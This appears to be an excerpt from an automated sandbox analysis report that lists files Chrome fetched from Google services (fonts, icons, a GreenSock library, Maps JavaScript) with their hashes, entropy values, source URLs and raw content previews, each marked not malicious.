                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:9JKglioE6pMcO5oiXZuh+u/U7pLnZ0jnn7dwp5KRf0271XM8zAJPzSjCWdJ28/p2:9J66pTOlI+u/U7pLnZ0jn7dwuRfU8zAd
                                                                                                                                                                                                                                                                                          MD5:714ACF1F5A07C6204BBD7E59194A2870
                                                                                                                                                                                                                                                                                          SHA1:3F8170F84AA88CC81D56C4383CF3758E7945D71F
                                                                                                                                                                                                                                                                                          SHA-256:1C58D90328C77231DAAA4F46073F3BADE862DB0E24A896F1B17912BB52C0FDDA
                                                                                                                                                                                                                                                                                          SHA-512:FE1D52B327E09B1936B156546DF09F10802ED8D51C474217F4E02FFB8C312F519540136833C5E51A07CC7E25A748F2DECAC7D393885BF4AF05A53CB9C52465B9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx..y.T..?..^Uuu7.44;..K..n.Mp.4..Fe.......dr.1.....%.q"q..h......3!.9..M7.`\..l..&.MwUW...?Z<4T5U.....>.p..{..~.}........(P O.\;.)v\.....KP..)....Z.b........b-b<..W$f ..A$b.r....~.L.e...2.;b{[..#eFt0*.A...P...2T.#...U-..E...h=p@.N............/.}.+.....v..%.GS..2.....*.A.lE.B....Q.Aw!...g..5...[CM...k6x.6..y/...'.....a.@......m..ETv"l.j.....}W.~.]O.#/..u.XW\g..~.1.LPaX~9....V.Z./...U..\{u4y...~..X<../.0.t.H(.~..*V.7....U...6......WH]... .-P..$O|K......{z.s..z.......&L..7..$..\..!v...*...^.J....._<..9...3....\.....DY.h2..\[..b;'..]8.r.s?.A@ .>d....S...U...6.U.w.3,....Q.3.(..<.....+k.).F.&..*.3...0"[6...5.fz....d.\V...s.c^.d..@8W..z....c.G.|~\YK...9o......c&r.....~....:...{..%y...O.O....}..~.p3.`dLo9.g..U.F... 8.^.gj._.a"...}e..ll:....h...m.....q.g.2.d*..I.K.5.p. ...m...e!...|E..~..X+.@.....>[..8(.>.wy.A?MeD.=S...N....A...k.-_^].N.....eq.PsIA..X.....|yuC6Lv....X.HA...|..._...P..vJ....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1572)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):24990
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.571861616289767
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:id4/FGwUi038enbUEyOhmbqGIwBjh4ZYDyPHe//mlX7ib3DdA07EhNymbqGIwSc9:Vz+6qd4Xi5qiddnX54I
                                                                                                                                                                                                                                                                                          MD5:08FBDBBD39BFDF04B1E93C9DFAE301DE
                                                                                                                                                                                                                                                                                          SHA1:42C83396C787C7AC63DED02549E68FFDE7BE1754
                                                                                                                                                                                                                                                                                          SHA-256:8978D66BCF2A41D106385EC242C161463B1A359419A71D7961E4B3DA6E2804A8
                                                                                                                                                                                                                                                                                          SHA-512:8816359F3376034B6C5AFA035375B693E590D13B52B9FC6622199B6F3CC1C48B32C1CB137DB75639923FE2CE44670CAAD517E4724F5EEC37555208B536E16150
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:"https://fonts.googleapis.com/css?family=Google+Sans+Display|Google+Sans:400,500|Google+Sans+Text:400,500&display=swap"
                                                                                                                                                                                                                                                                                          Preview:/*. * See: https://fonts.google.com/license/googlerestricted. */./* armenian */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/googlesans/v61/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPiIUvaYr.woff2) format('woff2');. unicode-range: U+0308, U+0530-058F, U+2010, U+2024, U+25CC, U+FB13-FB17;.}./* bengali */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/googlesans/v61/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPiAUvaYr.woff2) format('woff2');. unicode-range: U+0951-0952, U+0964-0965, U+0980-09FE, U+1CD0, U+1CD2, U+1CD5-1CD6, U+1CD8, U+1CE1, U+1CEA, U+1CED, U+1CF2, U+1CF5-1CF7, U+200C-200D, U+20B9, U+25CC, U+A8F1;.}./* cyrillic-ext */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.g
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (32066)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):107961
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.359093244687028
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:jV4hHAqu0mcKYXcnNUyHTPLkABMyl9A7/nplFblCPgKDrNUK:jiRVu0lKY666LkABNl9YPb7KNUK
                                                                                                                                                                                                                                                                                          MD5:499BA64A23378545748FF12D372E59E9
                                                                                                                                                                                                                                                                                          SHA1:EAA4E4A08400DA3F22DEDDA706BA56CDCE5B0B7A
                                                                                                                                                                                                                                                                                          SHA-256:001ACBB15D9C69510C0817E6DDE361BFF098406FAD182AB3C367F86FF3DA8343
                                                                                                                                                                                                                                                                                          SHA-512:F16CB8287D0EF80BB38CC9B5C3941F6798F9FF2F10FE471492D2BD98F515694A01BE1DD03D4641F36D96FEFCBB50BAAB8B7C91F1D687DC5E7CF98F19D3CAB37A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:/*!. * VERSION: 1.18.0. * DATE: 2015-09-05. * UPDATES AND DOCS AT: http://greensock.com. * . * Includes all of the following: TweenLite, TweenMax, TimelineLite, TimelineMax, EasePack, CSSPlugin, RoundPropsPlugin, BezierPlugin, AttrPlugin, DirectionalRotationPlugin. *. * @license Copyright (c) 2008-2015, GreenSock. All rights reserved.. * This work is subject to the terms at http://greensock.com/standard-license or for. * Club GreenSock members, the software agreement that was issued with your membership.. * . * @author: Jack Doyle, jack@greensock.com. **/.var _gsScope="undefined"!=typeof module&&module.exports&&"undefined"!=typeof global?global:this||window;(_gsScope._gsQueue||(_gsScope._gsQueue=[])).push(function(){"use strict";_gsScope._gsDefine("TweenMax",["core.Animation","core.SimpleTimeline","TweenLite"],function(t,e,i){var s=function(t){var e,i=[],s=t.length;for(e=0;e!==s;i.push(t[e++]));return i},r=function(t,e,i){var s,r,n=t.cycle;for(s in n)r=n[s],t[s]="function"==typeof r?r.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, max compression, original size modulo 2^32 557662
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):181874
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.998204692850876
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:3072:Ht0wznqawTrG8lV5RLoG6sRMw376F226jrWpAfcVbE65rP6zGubUyXnc:CwzyVlVUyMlF2/rEqcV4gPQGubRs
                                                                                                                                                                                                                                                                                          MD5:8CBD0ECF4CA0CF29CE36CBF0247333BE
                                                                                                                                                                                                                                                                                          SHA1:69E61BF9A71508EAE3F974F37D99C715938D3EDA
                                                                                                                                                                                                                                                                                          SHA-256:2469FBDAD92E6B5AB06879CDF0B4207147D9EA873A3745B336D060088E84C38F
                                                                                                                                                                                                                                                                                          SHA-512:DE2CD037A29A4DA3EC81DC8D01F3C9093ECFC5D3675F49C806C913293561F852F9DB035A8E3D0276CFF40B879BC66DEC0A7495BBE2C963F89AD788E0B6F7527B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.............V....*.v.%..\.J..*oBHB..*.K....[..#.I....:}.~.....|.w.o../....m..3F..........k...(..q.42?.. o].%=....u|.7.b_....^.HB.V...:..F.}..Y43c~,..<&.,*FY.Hh....-....$K/.(L...z......$-.Gq2h....0j.......^...(.^.z.fs.`.....Wo..xAt..2..:.<K.".\...2....v.7..I...$|.j...U....h..&j..IP}..z.nMm..v{.eu..gu.(\X.V..0J....hv...szm-......j..%k]7.~.>....((...8.....ko.G....~.-...7J..........az....y...V.}I/..O.<....f...n?..A......;.lG.x.3.r.#..o\aW...?o._;...E..$.._..z}.WdWf....o..{E..j..p[}....u..N..w8.:M.q&j..49..G.lI....0u...yo8.:.....E.b.j....?.s..j.GR.DIF.a.F-...]0......s.4*N.A.D.f..z..~.....Y..K.?E.G..QW.gW....wz...K0^...)H.j....F.$..E..`&...>...M.j....:.:.....M....z.77c...ir.eEC.V.H.gY|...y.P...M...,..2..g....T...q....KLO..k...`.......C..B..K..[A...?......T.[77S.jD................S.x|.P:!W^.o.'a..[..K....R....k;K..+..6X.....3.......m.R{}.>3.l..%:..m.4.."..>..~...i.|...:...H.%.y.N[.C.5.........zTQ..Nt.|..Xh......q....L....{_.........@.zz...c
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):9615
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.972142301683551
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:YL/9PM2qd6x980bBOeZjkxZBxZqPfe9hhUWWcgKJO69ucstA5HyyWU:YD9PM2d980oDZrA2a5KJDscs8Hd3
                                                                                                                                                                                                                                                                                          MD5:CEE10F64B70B2F7DCDFD728D4FC54C89
                                                                                                                                                                                                                                                                                          SHA1:3ED572063F27C9A8B3274F9B6815B4267A8F32CF
                                                                                                                                                                                                                                                                                          SHA-256:B995946A022C670242313955BA02D1A4B7B2CA3DB1820DDD731B706CE9D5DB3D
                                                                                                                                                                                                                                                                                          SHA-512:745CEA658651D60C099DA3C3086D0A63ED3160BC53902977069A1F79F27C6D7A5300716F7035567128AA151B926C780753DF74EF5D1A46BA8BA8644854D7641A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/TVNK8r0QEiNhXwfjVlziAqFcBQPkuPHKyilz6atnzslwMho1no8n4EJV30tOT0T6y3RXrmCzyiNd74HSYkJPsAk4545WWBxBZgoPxg=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d... .IDATx..y..U....V....;..@B.B".....u..w.Aq..DG.F_.qCGPG@qF|U.A.....A.a..}...@B....=kU...Q.,..t.;..&.....n-....s.}.(..(..(..(..(.b,0.>..M.r..1.......l.w3.\.x.TWe........o.m@..g.x...>...5.K.w."(.....>..........`..`....sV~j..5)x..l..DT..!y{C....}j.e.LLa.&.ox..mO~].Y^.!..c.>.....d..M.....,8...)v0.s..O.;...L....{.i0+..\(`...e.....M........3........x...xn.?..d3'=..5S].B.W.......%.>.l..UW.U..Q.i.&.7...<.r ..h..I.F.mR7.g....=.g...H.T?.x.uI.......]...~..l..@Z...[_.\.r)p.`...>H...F..-.N."q......{^.U.Z..7{.....*W..N.3..^7..0F.......g....>.[w..zuK.L.d.@...>....1C.7&8G....*.W./8>mj....n..[...y.g....@....?.....B.U+..R..e..........dB.E..H.K..M.Q%..H...g!Z..M..k7..].).".:......o.1..%.o.sQ...W.w.Nv~.:..Q.[AYE2.\.......`G..zL.....8q.#........Br}H...n./.*.*...5.%.....4..X|P%....u....l..q..I..Ip...X..;.Mo....s...D.B.P..$&V....a.....EWVb...x...........U6.d.H...D.t"..au.....t.U...%..<.......4Uu...7..?...&....#..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1166
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.691960667496785
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:zeB8UKUcXK2ikTRek1c4ZiE6VV6B0KbGeT2:zeNWXK/GRx24ZiEkV6BrRT2
                                                                                                                                                                                                                                                                                          MD5:08B76701BB5EF4B5FB05E05FA3EF33AC
                                                                                                                                                                                                                                                                                          SHA1:10DBA471BC3E4AA376256FE00BA6C8A4AFBDAB1B
                                                                                                                                                                                                                                                                                          SHA-256:FFF7FFB81126FC736AF24F8797F397C29F65C088DA60E87CD1241834E19D6274
                                                                                                                                                                                                                                                                                          SHA-512:C4B3B7A6965F15BDD4A05B4DB24C25FC91877C174A29A70FF7B9BAD9556A8B7F730F33F90926FC89E6F951F171C6BA2B86D1FC090E60F4297415ECF8D16E18E2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d....EIDATx....k\U.....L.@lC.D.)..-...._.A..R..n.nU.U.........J.Q.*.]l...6..B4H..f.... ...{.9.....&.3.|I.......T.........'.?W..V...q.a.-..>N?.......;......e.,.........%.9.2...I\v...n.....<'...>MY~..|.mv8...<....>H..G.=z.x..q.%s?.....,{...Q.%/.s.......>....036...r...]'...............v.R..D.x)p..[...zQ-^..G4........~._........#......x)p.j_...~..^..Fm....S...ay_..8<...........7..e^.T..Q.@[....3....qc.....UNU.;q.`..[u=..*......k.q.l......).q.l......).q.l.....k...'.FcO..l.'pw........'..@.g...M.x.o.......rq.........).q.l\<K..,.....F.9 .3......K.7p..kn..d..]%.Y.$..........t.=.X..g)^>.....|.*.~..H...E..?...-.......1.. /..C.e.9..'..,.. +.i(..:S.t.6N..S`...8.6..-...:t..../.u.z.[~x.......-.o.).I.>.../.O.g..8........_.....A..{..p..>P.g.@....C...}~r.....l......).qI,Y.].$..va.......5.8.6N..S`...$.h..._..u...I.......l......).q.,Y...Z[a....[i7...zy.O..Av}~ .)..:.......Q}b..5.8.6N..S`...8.6N..S`...8.6N..S`...8
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 35060, version 1.0
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):35060
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9934247518702914
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:768:VWgzOJq8VMlI+d620JaSUhkJN1tLmkLqnEsKeeBClx7styedpa12:dSJBVMlfd6VJaSUCv1RmkavKetUXnZ
                                                                                                                                                                                                                                                                                          MD5:0360DBC6E8C09DCE9183A1FD78F3BE2E
                                                                                                                                                                                                                                                                                          SHA1:6CD4B65A94707AE941D78B12F082C968CB05EC92
                                                                                                                                                                                                                                                                                          SHA-256:2DB6BC36808D43FA89029C652636E206FA3E889B35ECF71814AB85F8BA944AF3
                                                                                                                                                                                                                                                                                          SHA-512:93C9F1856142DA0709F807CA3E5836065E61BC8160F9281FEC9244F31ED8AE8DF500CD5C64048AC59B4DBC36EBD18BA8E7FBCEEF58134DD76441079FAE147AB9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/productsans/v19/pxiDypQkot1TnFhsFMOfGShVF9eO.woff2
                                                                                                                                                                                                                                                                                          Preview:wOF2..............u$..............................T....`..P.l..a.....D..;.."......6.$..@. ..,..6...[.]q..}:P..(....W.(........(;h 8..r.o...........k..........>..eZT\K.....4l..Z]...1B.1.G.....|..p..._..S/...^I.e..l.=.I1...0..L./..D..Y{.w...*.(.....Q..J....v.........z......Q/.K..f._...-..T.f...[..U.).>.K35v...n.?-thr......w.?[D.u.Q.}..i_.cp..0E.R5m.>I.......x......H."C,....2...q...E..r.?...R../.J..m..X97...E.fJ...=.Q.>..`.QXuw..e."........\^.....~....>M.....h.Q.-.......SM,;W......#..#.B.....K.o...`...z...t....".$..s....o.v...w.I.mg.$n....../...N.....8H........^.~....X.Q.,YB.U...uX.e.o.l..o.2f..^_].~.3w*........J$2)_.c8...&^.>...r.29.D&.I....T".H....O.2.$..r.\...1.}.ES~5...t.X`.x.gQk..e.L.N......{.6...4..G.....2.z...V...Vy.'..../.....'...z..i.G.......`...$@.k......1.....{PH.....qf......_...A.e..7.....C.?.^.....,......NDa<b..*F...:.....+..|.._I+.2.^......l...3..^.)qJ...0.....X.....yj....J"...lo..._j...Z...0...m..2.$.EBa.....w...|..2&!.$..!S/^'..*...r.U-.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 96 x 96, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1536
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.760721830205145
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:ActqT6R5b3CJtmqZd217m9RBjO11NHymcS6fh8QZiZwLaAat5LnZXsY8Spf2ggng:5FSJtTj2165CPFe5cODCLZc1v6SU
                                                                                                                                                                                                                                                                                          MD5:118E3DD544872C1830F991803A9D9A87
                                                                                                                                                                                                                                                                                          SHA1:D7A4B80C1BCB652432DE878F08A5FD77FDAFEF74
                                                                                                                                                                                                                                                                                          SHA-256:4C3D60106FE7E3BC4D771430CFED1387D1E5CCF3AB5819827E38D6A560F47003
                                                                                                                                                                                                                                                                                          SHA-512:D0C6E9A279804C8EA92C3BE39B8256312A6599FB32481C126171DC018251910BD49CD529FC2D2C2C28870355EB129CC315F94FFD6C952EF34B42F6BE1DB90C7A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...`...`......w8....sRGB.........IDATx^.\...0..;.p2x'.N....B6....iKWBzl[.f.K........V...!`s.<.<.lF`..'...6#.Y....)._..._^.....U......U...Mo.gg...8....R,dd.0.0.=...(..B.....B..I{e.....2......Tr......T._. dH..../!..I.:B.".....4..p*......~. .....Q...~.#..6.V.e.W.<JI.Q.U^..[.y.>...!.I..|d.[.l"t.I`......D.'...k..I.J...(..~...:..HX% ....B@&...h...% ...../..;.'x...`.L3m@.}.`%`..&.B...K...........3..$.S..#..3.."A;Y.5...f.X.b,K...@..jO..+..$....._..s.9...).$h......E4.=....Q.<.....7".....k$h>x...HC]=.......`.{..g.....Z......{S.|<S..Pq.|,.'....G/@P..g...X..k.......d..NP;....`i^.a=.=..R.,~ r....G.....~M..hr.....>z^.F........`1.pO...o.3"...G.L#.3Dh2.r...E.,z....+....8..].[].....s..,`._FO.(+.....Q.N@..6....].".9..[.fP....4...%A.?nX.....Q.|y.\=,.q;.......Y.,......_..-..7....Q3...*.@V..A{ ...6..~...,rQ...../.f.....n.E..i..^.`.oGk....Uv...:A.c...|..f.R....].,.$g$h.d.......gK..A....Y.H...\....z.0...:..V.:j.)3=. MX.l.X~..Q.<. ....-A...SWY....%@......
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2457
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.887151510458016
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:Sy+oGjsKDEg8Kn4sKbMYht8rhHNIsmj2EmpOSPIvDcSUxhnCm4M9Vd91WKSCl+F:b+oLF/WutOhesmj2Emp2QSUfnZJtr+F
                                                                                                                                                                                                                                                                                          MD5:E7951DB538299C0758D7EAC93E9E68E1
                                                                                                                                                                                                                                                                                          SHA1:AEE95EF08CB635E22594BC0DD9719B16A5516EF4
                                                                                                                                                                                                                                                                                          SHA-256:026E10CF13A19B3D9D71042DB070BA55AF8A77EADC8E22D9B16E3E94F33C2229
                                                                                                                                                                                                                                                                                          SHA-512:3887F6AF641C3CF1EDA84724D1660491251FE6076EE27E99D33D1D93BE7E831F18B798EBA43240CC6A292DA649B5D6ED7E92794DB3CD22FA9F14EEBB0D4A169A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d....PIDATx...m.........{Y...\X....(....EM..h.i..h.RE.j.&ML.V.4M./....j.I.ZS#E.j...+O.X....wW.......03./...egv...=.Wp...3..g.?....i..i..i..i..i......B.y<]e....B..d.eW.k.a...!...wy9..%.km./I3B#.x...)......EI.A,n..X.....o...{......h..@..o.........=5B.......-..`...R~.....x.....I...~.z>..X..JH...U....g...m./.Txy...5Wzm..C`...]..".m..4zm......F.......6.8.}...A..r:.......8.t.!...9.p..CN..r:.............y.CB:.AO..|M.L....%.W.....(........5.0...m..h.jmO..........8.t.!...9.p..CN..rJ.t.w.|...V.......4.4hl0.]k.r.{.V".....V ...%...l.....5.R&......=...r<p..k#,...3_...;r..?s..z.o_.....|..e...f[....G&L.......\.\..K-..%..s....?fx.#........:..P,.c...o.0.VI.`..v..N..).,n.j.o..Z...4....w..w.R..'..U-\P..]X.B.."..:...%.*.}WX.....)..^I..l;?)x....?>.@...Y....u&."..1cH.....,'.$...ndKp...&.h.......^..e...,n.UI.............3..,(..@..\;Y05!8.....%...?#.S.....M.'.-V.Q...p..=k./.5....O2#>8..g..+.2..,.?..{.4N.<.<..2.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (2406)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):78365
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.456753311036989
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:o/oPKW2/xQEiuVQf4bLR5dz34pkpZZvqxdESTsBKX4cg6KlJHkOV5FdaJC03Xu2i:uoPK//xQEiuVQf4btr32MZdqxGSgBKXQ
                                                                                                                                                                                                                                                                                          MD5:9E43F550A52998CA7A0FD723D116582E
                                                                                                                                                                                                                                                                                          SHA1:C6E39D9DFD56C38AA062CACF979D690C44E03C0F
                                                                                                                                                                                                                                                                                          SHA-256:311E9E8A1ABDA5299C796E9DE880B4589FC5D52C72C0317DC5FF789B7929066F
                                                                                                                                                                                                                                                                                          SHA-512:F759B63313B11E34815FE52186D31B6F1C9DC7B4A9D7D5425B5BF3048F5C005C85EFC044C342EF8B8A2B068FAE418EC0F44BEC148B59A29E2F40354DCB2F5C57
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://maps.googleapis.com/maps-api-v3/api/js/58/6/map.js
                                                                                                                                                                                                                                                                                          Preview:google.maps.__gjsload__('map', function(_){var Gva=function(){var a=_.dr();return _.gi(a.Gg,18)},Hva=function(){var a=_.dr();return _.H(a.Gg,17)},Iva=function(a,b){return a.Eg?new _.cm(b.Eg,b.Fg):_.dm(a,_.lr(_.mr(a,b)))},Jva=function(a){if(!a.getDiv().hasAttribute("dir"))return!1;const b=a.getDiv().dir;return b==="rtl"?!0:b==="ltr"?!1:window.getComputedStyle(a.getDiv()).direction==="rtl"},Kva=function(a,b){const c=a.length,d=typeof a==="string"?a.split(""):a;for(let e=0;e<c;e++)if(e in d&&b.call(void 0,d[e],e,a))return e;return-1},Lva=function(a){return new Promise((b,.c)=>{window.requestAnimationFrame(()=>{try{a?_.Km(a,!1)?b():c(Error("Error focusing element: The element is not focused after the focus attempt.")):c(Error("Error focusing element: null element cannot be focused"))}catch(d){c(d)}})})},Mva=function(a,b){a.Fg.has(b);return new _.gra(()=>{Date.now()>=a.Ig&&a.reset();a.Eg.has(b)||a.Hg.has(b)?a.Eg.has(b)&&!a.Hg.has(b)&&a.Eg.set(b,"over_ttl"):(a.Eg.set(b,_.Dn()),a.Hg.add(b));r
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):842
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.561503064205602
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:t4jSvemRbTTZ/S+h0AGTDL7iK+/vZ81tvh6RSu:hXVZ/t0vB+/WbvARP
                                                                                                                                                                                                                                                                                          MD5:00ACBD846E3E89D4B9E06E70C3F1F961
                                                                                                                                                                                                                                                                                          SHA1:C944F19A957800D8DF262850A7B2724D946A456B
                                                                                                                                                                                                                                                                                          SHA-256:36007D3F191AA0ADD72C7F6EA749B75545AD5D12E793AB760F31675F2E6EB480
                                                                                                                                                                                                                                                                                          SHA-512:C17719B3C4BF849A840AA22D34F2B85EB3D496EC9A98C985AE4748E1354C79177435FCCB81C9E01E77068A62605377C9C149C26A5AB3E096BF8D449204B36EB0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/marketing-cms/assets/images/bc/96/607b2117481999ae9ed5fc691aff/compost-24dp.svg
                                                                                                                                                                                                                                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" enable-background="new 0 0 24 24" height="24px" viewBox="0 0 24 24" width="24px" fill="#000000"><rect fill="none" height="24" width="24"/><path d="M12.87,11.81c-0.23-0.38-0.37-0.83-0.37-1.31C12.5,9.12,13.62,8,15,8l1,0c1.51,0,2-1,2-1s0.55,6-3,6 c-0.49,0-0.94-0.14-1.32-0.38c-0.24,0.64-0.59,1.76-0.76,2.96c1.26,0.22,2.28,0.89,2.77,1.77c1.69-1.17,2.81-3.13,2.81-5.35h3 c0,5.24-4.26,9.5-9.5,9.5S2.5,17.24,2.5,12S6.76,2.5,12,2.5V0l4,4l-4,4V5.5c-3.58,0-6.5,2.92-6.5,6.5c0,2.21,1.11,4.17,2.81,5.35 c0.51-0.92,1.63-1.62,2.98-1.8c-0.09-0.69-0.26-1.42-0.49-2.03C10.45,13.82,10,14,9.5,14c-1.1,0-2-0.9-2-2v-0.99 c0-0.56-0.19-1.09-0.5-1.51c0,0,4.45-0.23,4.5,2.5c0,0.29-0.06,0.56-0.17,0.8C10.91,12.48,10.47,12.2,10,12 c0.58,0.43,1.37,1.37,2,2.6c0.67-1.62,1.68-3.27,3-4.6C14.24,10.52,13.53,11.12,12.87,11.81z"/></svg>
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (2287)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):222005
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.525934675920663
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:DJ+6L9F/dcVoIqz3mnxXEzmnBBBpELq/N6p/kn6Z4vBk7SzCCdwDGslfjiCCc+Dp:9+6L9F/dYoIqz38xXJnBBBpELq/N6p/q
                                                                                                                                                                                                                                                                                          MD5:6871D302C8E74C81AD6046E03E5BEA11
                                                                                                                                                                                                                                                                                          SHA1:F20159BE94B5BFCFBC5C7679F361399F42328D29
                                                                                                                                                                                                                                                                                          SHA-256:11456E3D960B97AF5ED7736ADE63019B6BECFC2491A5661171C3E53D2712DE75
                                                                                                                                                                                                                                                                                          SHA-512:5A4EFF929DA69710F5EDA33CC2DB3C0677166A3B4AE7947909BEFAC8FED39EB33E4381814688DD0893CB44F28FF429E9711D7EB1DE0A2C3759EF36961764232A
                                                                                                                                                                                                                                                                                          Malicious:false
